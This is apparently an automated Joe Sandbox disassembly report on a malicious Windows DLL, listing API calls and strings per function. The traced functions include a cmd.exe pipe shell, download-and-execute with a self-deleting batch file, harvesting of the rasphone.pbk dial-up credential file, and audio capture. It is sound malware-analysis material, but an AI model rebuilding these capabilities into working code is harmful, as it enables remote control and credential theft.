Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: CloseHandle$DisconnectNamedPipeTerminate$SleepThread$ObjectProcessSingleWait
String ID:
API String ID: 3528565692-0
Opcode ID: e2462b9e51b2cd782e0542687645bfdbb219e5ad88ab8734fd4dc33a84b79df5
Instruction ID: 9c54264b77c618bb7f3ff833bc2f4ed521a7b34ae7468bb6bf74d3fa9e72dd85
Opcode Fuzzy Hash: e2462b9e51b2cd782e0542687645bfdbb219e5ad88ab8734fd4dc33a84b79df5
Instruction Fuzzy Hash: 3921DA71600744ABD624EBBACC84F5BF3EDAF98750F014A0DF246D76A0CAB4F8419E60

Function 10008110 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 158registrystringCOMMON

Download Yara Rule

APIs

strrchr.MSVCRT ref: 10008139
RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,000F003F,?), ref: 1000816D

Strings

"%1, xrefs: 10008239
%s\shell\open\command, xrefs: 100081C4
D, xrefs: 100082A1

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: Openstrrchr
String ID: "%1$%s\shell\open\command$D
API String ID: 1564636448-1634606264
Opcode ID: 2cf8cfa4d3311e3e4da36e51a929757a0acaa25937306c6d2d5e068f66906cb7
Instruction ID: ab82aeec8821551b8da03e6dabbe2dd6c64f2c5119572b537ef325ac62f7637e
Opcode Fuzzy Hash: 2cf8cfa4d3311e3e4da36e51a929757a0acaa25937306c6d2d5e068f66906cb7
Instruction Fuzzy Hash: 13419572108345ABE714CB60DC80FABB7EDFBC4345F004C1DF69497250D675AA49C762

Function 10010FE0 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 199pipeprocessCOMMON

Download Yara Rule

APIs

Part of subcall function 1000D1D0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,1000C45E,?,76F923A0,00000000,100026B5,?,?,00000000,?,?), ref: 1000D1EE

CreatePipe.KERNEL32 ref: 1001108D
CloseHandle.KERNEL32(?), ref: 100110A4
CloseHandle.KERNEL32(?), ref: 100110B1
CreatePipe.KERNEL32(00001F58,00001F54,00001F50,00000000), ref: 100110C4
CloseHandle.KERNEL32(?), ref: 100110DB
CloseHandle.KERNEL32(?), ref: 100110E8
GetStartupInfoA.KERNEL32(0000000C), ref: 10011111
GetSystemDirectoryA.KERNEL32 ref: 10011148
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?), ref: 10011199
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 100111AD
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 100111B3
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 100111B9
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 100111BE

Strings

\cmd.exe, xrefs: 1001114E
D, xrefs: 1001112D

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: CloseHandle$Create$Pipe$DirectoryEventInfoProcessStartupSystem
String ID: D$\cmd.exe
API String ID: 1868129719-520541716
Opcode ID: dd8b29a44c76f5e59cb4cd19e233df8ee08fd2a2694a344ceaa59677d3bb7f86
Instruction ID: 21a73dd738c10b035e80e71e0c9392a4d89bcda19f6c107ece9e955ff4ea587f
Opcode Fuzzy Hash: dd8b29a44c76f5e59cb4cd19e233df8ee08fd2a2694a344ceaa59677d3bb7f86
Instruction Fuzzy Hash: 0271AF71604745AFE714CF25CC81B9BBBE5EFC8B00F104A2EF655AB290D7B4E8448B96

Function 10006AD0 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 169filesleepthreadCOMMON

Download Yara Rule

APIs

sprintf.MSVCRT ref: 10006B8F
sprintf.MSVCRT ref: 10006BD7
URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 10006BEF
Sleep.KERNEL32(00000064,00000000,?,?,00000000,00000000), ref: 10006BF6
RtlExitUserThread.NTDLL(00000000), ref: 10006C08
Sleep.KERNEL32(000493E0), ref: 10006C38
CreateFileA.KERNEL32(C:\Del.bat,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 10006C72
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 10006C92
CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 10006C99
WinExec.KERNEL32(C:\Del.bat,00000000), ref: 10006CA6
RtlExitUserThread.NTDLL(00000000), ref: 10006CBF

Part of subcall function 100067F0: GetInputState.USER32 ref: 100067F3
Part of subcall function 100067F0: GetCurrentThreadId.KERNEL32 ref: 100067FF
Part of subcall function 100067F0: PostThreadMessageA.USER32(00000000), ref: 10006806
Part of subcall function 100067F0: GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 10006817

Part of subcall function 100040D0: GetTickCount.KERNEL32 ref: 100040D1
Part of subcall function 100040D0: rand.MSVCRT ref: 100040D9

Strings

%s?abc=%d%d%d%d, xrefs: 10006B89
Del c:\windows\temp\**.cccDel %0, xrefs: 10006C3F
C:\Del.bat, xrefs: 10006C6C, 10006CA1
C:\WINDOWS\TEMP\%d%d%d%d.ccc, xrefs: 10006BD1

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: Thread$File$ExitMessageSleepUsersprintf$CloseCountCreateCurrentDownloadExecHandleInputPostStateTickWriterand
String ID: %s?abc=%d%d%d%d$C:\Del.bat$C:\WINDOWS\TEMP\%d%d%d%d.ccc$Del c:\windows\temp\**.cccDel %0
API String ID: 1802622305-1970547419
Opcode ID: 5d690c170f66fd898cb5acb4569625737ab5efa727c2d913b09523f43e067e74
Instruction ID: a99f9cc9cae1f12021b554281c88dee9c3d8dd1fd31d28a6ceb09f359c56c71a
Opcode Fuzzy Hash: 5d690c170f66fd898cb5acb4569625737ab5efa727c2d913b09523f43e067e74
Instruction Fuzzy Hash: EC4105B26403413EF210DBA4DC42FB7779AEB85744F110438F78AAA2C1DAB579498667

Function 10006F40 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 89stringCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32 ref: 10006F5E
strchr.MSVCRT ref: 10006F70
lstrcpy.KERNEL32(00000001), ref: 10006F7B
lstrcat.KERNEL32(?,?), ref: 10006F90
lstrcat.KERNEL32(?,\Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk), ref: 10006F9C
SHGetSpecialFolderPathA.SHELL32(00000000,?,00000023,00000000), ref: 10006FAC
wsprintfA.USER32 ref: 10006FCC
??2@YAPAXI@Z.MSVCRT(00001000), ref: 10006FEA
GetPrivateProfileSectionNamesA.KERNEL32(00000000,00001000,00000400), ref: 10007015
lstrlen.KERNEL32(00000000), ref: 1000702D
??3@YAXPAX@Z.MSVCRT(00000000), ref: 1000704B

Strings

\Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk, xrefs: 10006F96
Microsoft\Network\Connections\pbk\rasphone.pbk, xrefs: 10006FB9
%s//%s, xrefs: 10006FC6
Documents and Settings\, xrefs: 10006F64

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: lstrcat$??2@??3@DirectoryFolderNamesPathPrivateProfileSectionSpecialWindowslstrcpylstrlenstrchrwsprintf
String ID: %s//%s$Documents and Settings\$Microsoft\Network\Connections\pbk\rasphone.pbk$\Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk
API String ID: 1834765725-145037316
Opcode ID: 79a34f43d602c1009b597179ffdf5f7e60e5cfccbe8278ec635163b31d8a3950
Instruction ID: 9755ad88c6a7c2de1a7a09f9197344cb42d28d28b3bab84a9660466105d068a3
Opcode Fuzzy Hash: 79a34f43d602c1009b597179ffdf5f7e60e5cfccbe8278ec635163b31d8a3950
Instruction Fuzzy Hash: 3C31A1B1504395AFE710DF60DC88F9BB7E9FB89705F04091CF68597240E679EA09CBA2

Function 100077C0 Relevance: 22.9, APIs: 15, Instructions: 369COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(0000001C,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 10007840
??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 10007883
??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 10007897
??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 100078DD
??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 100078F1
??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 10007937
??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 1000794B
??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 10007991
??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 100079A5
??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 100079EB
??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 100079FF
??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 10007A58
??2@YAPAXI@Z.MSVCRT(?,?,?), ref: 10007A6C
??3@YAXPAX@Z.MSVCRT(00000000,?,?), ref: 10007AB1
??2@YAPAXI@Z.MSVCRT(?,?,?), ref: 10007AC5

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: ??2@$??3@
String ID:
API String ID: 1245774677-0
Opcode ID: efc4adb11d259ce337aa2f88174ac1102378eaacc0aa5d6b11d5639599dfff2b
Instruction ID: ecb620a65a387641466dd8f5cfd537940ff52a14495c8058afc9bdc292101b4f
Opcode Fuzzy Hash: efc4adb11d259ce337aa2f88174ac1102378eaacc0aa5d6b11d5639599dfff2b
Instruction Fuzzy Hash: BCC1BCBAB042054BE718CE39C89296B77D6FB882A0B15862CFD1A873C1DF75ED05C791

Function 100092E0 Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 93stringCOMMON

Download Yara Rule

APIs

Part of subcall function 1000D900: RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,76F923A0,?,?), ref: 1000D96C

lstrlen.KERNEL32(?), ref: 10009365
lstrcat.KERNEL32(?,rar.exe), ref: 100093A1
lstrcpy.KERNEL32(?,?), ref: 100093B2
PathRemoveFileSpecA.SHLWAPI(?), ref: 100093BC
lstrcpy.KERNEL32(?,?), ref: 100093C8
PathRemoveExtensionA.SHLWAPI(?), ref: 100093CF
lstrcat.KERNEL32(?,1007A0CC), ref: 100093DF
wsprintfA.USER32 ref: 100093F4
ShellExecuteA.SHELL32(00000000,open,?,?,00000000,00000000), ref: 10009418

Strings

x %s %s, xrefs: 100093EE
open, xrefs: 10009411
rar.exe, xrefs: 1000939B
WinRAR\shell\open\command, xrefs: 10009349

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: PathRemovelstrcatlstrcpy$ExecuteExtensionFileOpenShellSpeclstrlenwsprintf
String ID: WinRAR\shell\open\command$open$rar.exe$x %s %s
API String ID: 1763624715-2921234164
Opcode ID: ad5e5701b212f8edd3ead078ccd65cb98e6fd0e360b7cda8834bb0ad263879bd
Instruction ID: a81b6a790fa88baee27cdb696a84ad45282978667647cc58660b41da7713e94e
Opcode Fuzzy Hash: ad5e5701b212f8edd3ead078ccd65cb98e6fd0e360b7cda8834bb0ad263879bd
Instruction Fuzzy Hash: 6D3195B6104399AFE730DB64CC94FEB77AEEBC8304F00891CF68597141DA756A05CB62

Function 1000C130 Relevance: 22.8, APIs: 15, Instructions: 287stringCOMMON

Download Yara Rule

APIs

strchr.MSVCRT ref: 1000C166
atoi.MSVCRT(?), ref: 1000C197
strchr.MSVCRT ref: 1000C1E2
strncpy.MSVCRT ref: 1000C219
strchr.MSVCRT ref: 1000C225
strncpy.MSVCRT ref: 1000C250
strncpy.MSVCRT ref: 1000C26B

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: strchrstrncpy$atoi
String ID:
API String ID: 3940265933-0
Opcode ID: 7e5e4238010ca1327608cdc8460cd83de5e126a4c912968ad0552fe01382e086
Instruction ID: 21ca36c069230d07eea7d776a96db384ee496568b4fed2c6a8f6547b2fdee8a7
Opcode Fuzzy Hash: 7e5e4238010ca1327608cdc8460cd83de5e126a4c912968ad0552fe01382e086
Instruction Fuzzy Hash: 6591F8329002595BD728CB75CC45AEFB7A5FF88360F10436AF91AA32D0DEB49F45CA94

Function 10002D20 Relevance: 22.6, APIs: 15, Instructions: 88threadCOMMON

Download Yara Rule

APIs

waveInStop.WINMM(?,?,?,?,?,10002D08), ref: 10002D37
waveInReset.WINMM(?,?,?,?,?,10002D08), ref: 10002D41
waveInUnprepareHeader.WINMM(?,?,00000020,?,?,?,?,10002D08), ref: 10002D5E
waveInClose.WINMM(?,?,00000020,?,?,?,?,10002D08), ref: 10002D6A
TerminateThread.KERNEL32(?,000000FF,?,00000020,?,?,?,?,10002D08), ref: 10002D76
waveOutReset.WINMM(?,?,?,?,?,10002D08), ref: 10002D87
waveOutUnprepareHeader.WINMM(?,?,00000020,?,?,?,?,10002D08), ref: 10002DA4
waveOutClose.WINMM(?,?,00000020,?,?,?,?,10002D08), ref: 10002DB0
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,10002D08), ref: 10002DC2
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,10002D08), ref: 10002DCA
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,10002D08), ref: 10002DD3
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,10002D08), ref: 10002DDC
CloseHandle.KERNEL32(?), ref: 10002DF4
CloseHandle.KERNEL32(?), ref: 10002DFA
CloseHandle.KERNEL32(?), ref: 10002E00

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: wave$Close$??3@$Handle$HeaderResetUnprepare$StopTerminateThread
String ID:
API String ID: 3312516386-0
Opcode ID: d3448f76e52faa917ff72099c3d4ae32099888250af06bce9c62b5df9f15304b
Instruction ID: f53181e0cb89491cd7c99ff78531d68b368b4d0a2bb5ae7883e750d4989dc1ff
Opcode Fuzzy Hash: d3448f76e52faa917ff72099c3d4ae32099888250af06bce9c62b5df9f15304b
Instruction Fuzzy Hash: 82214DB62107519FE620DB71CC88967B3BEFF8C350B014A09E69247755EB75FC458B60

Function 10002820 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84windowregistryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 10002827
LoadIconA.USER32 ref: 1000285E
LoadCursorA.USER32(00000000,00007F00), ref: 1000286F
RegisterClassExA.USER32(?), ref: 1000288E
CreateWindowExA.USER32(00000000,1007A204,1007A204,00CF0000,000000DF,000000DF,000000DF,000000DF,00000000,00000000,00000000,00000000), ref: 100028B4
ShowWindow.USER32(00000000,00000005), ref: 100028C3
UpdateWindow.USER32(00000000), ref: 100028CA
GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 100028E1
TranslateMessage.USER32(00007F05), ref: 100028F9
DispatchMessageA.USER32(00007F05), ref: 10002900
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1000290D

Strings

0, xrefs: 10002842

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: Message$Window$Load$ClassCreateCursorDispatchHandleIconModuleRegisterShowTranslateUpdate
String ID: 0
API String ID: 2442869364-4108050209
Opcode ID: ffe4e2d3166741ce70057db877a5010deb8e940f0538d27bc5693e2a0d76c847
Instruction ID: 49f6c6a48927359fcf1092dd417bf73ba722ddb4962998ae2525dee049488c6b
Opcode Fuzzy Hash: ffe4e2d3166741ce70057db877a5010deb8e940f0538d27bc5693e2a0d76c847
Instruction Fuzzy Hash: C121B5715483607FF310DB688C49F4B7BA4EB85B60F104A19F744AB3C4EBB59A00CB96

Function 1000A950 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 62COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 1000A964
wsprintfA.USER32 ref: 1000A97D
wsprintfA.USER32 ref: 1000A9AC
wsprintfA.USER32 ref: 1000A9CA
wsprintfA.USER32 ref: 1000A9E9
wsprintfA.USER32 ref: 1000AA08
wsprintfA.USER32 ref: 1000AA1E

Strings

Windows XP, xrefs: 1000A9DF
Windows 2000, xrefs: 1000A9C0
Windows 2003, xrefs: 1000A9FE
Windows Windows7/Vista/2008, xrefs: 1000AA14
Windows NT, xrefs: 1000A9A2

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: wsprintf$Version
String ID: Windows 2000$Windows 2003$Windows NT$Windows Windows7/Vista/2008$Windows XP
API String ID: 514958720-574678973
Opcode ID: c538841ac387e5c01469a887863cc8ff63225bb54d14823df1dd693bf34828af
Instruction ID: 24eada89e271c6f03dafd311d52a79426f13bcc6e3bcc886577ca1c3c34736ac
Opcode Fuzzy Hash: c538841ac387e5c01469a887863cc8ff63225bb54d14823df1dd693bf34828af
Instruction Fuzzy Hash: D5118230900796ABF610CB58DCA4B8A77D0EB43295FD1C519F6C992310D738A994CB5B

Function 1000FE80 Relevance: 19.6, APIs: 13, Instructions: 74COMMON

Download Yara Rule

APIs

ReleaseDC.USER32(?,?), ref: 1000FEB8
DeleteDC.GDI32(?), ref: 1000FEC8
DeleteDC.GDI32(?), ref: 1000FECE
DeleteDC.GDI32(?), ref: 1000FED4
DeleteDC.GDI32(?), ref: 1000FEDD
DeleteObject.GDI32(?), ref: 1000FEE9
DeleteObject.GDI32(?), ref: 1000FEEF
DeleteObject.GDI32(?), ref: 1000FEF8
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,1006A14E,000000FF,1000FE68), ref: 1000FF02
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,1006A14E,000000FF,1000FE68), ref: 1000FF0E
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A14E,000000FF,1000FE68), ref: 1000FF17
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,1006A14E,000000FF,1000FE68), ref: 1000FF20
DestroyCursor.USER32(00000000), ref: 1000FF46

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: Delete$??3@$Object$CursorDestroyRelease
String ID:
API String ID: 2735177900-0
Opcode ID: 6d97574774b83c00f42543f7479bee7085eb61e582d7fdda2d66cd1cb8b7d107
Instruction ID: e788815f10d6092d27ca2afd98025b986ca8f6d31416693049e9cb6994815525
Opcode Fuzzy Hash: 6d97574774b83c00f42543f7479bee7085eb61e582d7fdda2d66cd1cb8b7d107
Instruction Fuzzy Hash: C121FAB6500B509BE324DB69CC80A67F3EDFF89610F154E1DF69683750DAB9F8448B60

Function 100068B0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 134sleepprocessthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 10006830: GetSystemDirectoryA.KERNEL32(?,00000100), ref: 10006843
Part of subcall function 10006830: sprintf.MSVCRT ref: 1000688E

RtlExitUserThread.NTDLL(00000000), ref: 10006A49

Part of subcall function 100040D0: GetTickCount.KERNEL32 ref: 100040D1
Part of subcall function 100040D0: rand.MSVCRT ref: 100040D9

sprintf.MSVCRT ref: 100069AF

Part of subcall function 100067F0: GetInputState.USER32 ref: 100067F3
Part of subcall function 100067F0: GetCurrentThreadId.KERNEL32 ref: 100067FF
Part of subcall function 100067F0: PostThreadMessageA.USER32(00000000), ref: 10006806
Part of subcall function 100067F0: GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 10006817

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 100069D9
Sleep.KERNEL32(00000064), ref: 100069DD
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 100069FF
Sleep.KERNEL32(00000064), ref: 10006A03
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 10006A25
Sleep.KERNEL32(000003E8), ref: 10006A2C
TerminateProcess.KERNEL32(?,00000000), ref: 10006A35

Strings

D, xrefs: 1000692B
"%s" "%s?abc=%d%d%d%d", xrefs: 100069A9

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
